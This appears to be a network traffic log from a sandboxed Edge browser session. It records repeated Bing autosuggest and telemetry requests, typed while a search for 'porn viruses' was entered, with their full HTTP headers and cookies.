Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 80
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163ce18b24bd78969cbbf36ff6c04
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-w5yIPW9cffAWUlszM1Z3pYQlrpDrVtfrUvO6Az/BxbU='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:34 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144334.8b92ccb
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:34 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144334.8b92f89
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20viruse&cp=11&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20viruse&cp=11&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 80
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163ce4a454f6bbab97cff5511ba1f
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ZBnM2gfcS03JcJiA27mBSGY7BhABVq9fib0RVQNOfkM='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:35 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144334.8b9305f
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20virus&cp=10&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20virus&cp=10&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 80
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163cf39eb4c7fb5833e57d4c62076
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-67Vkp4vQefucxU/eWKriqfgszOZEPxtLMEifu7Roj58='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:35 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144335.8b93513
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20vir&cp=8&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20vir&cp=8&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 80
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163cf04cc41d3ab73f64d57cedb6e
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-HUdzwyOXU2zC3cW8VF+/XJCcjytCLkbLo1sehie4GJM='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:35 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144335.8b93839
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20vi&cp=7&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20vi&cp=7&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 80
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d0a35945f2b52ac1cc5d0937ea
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
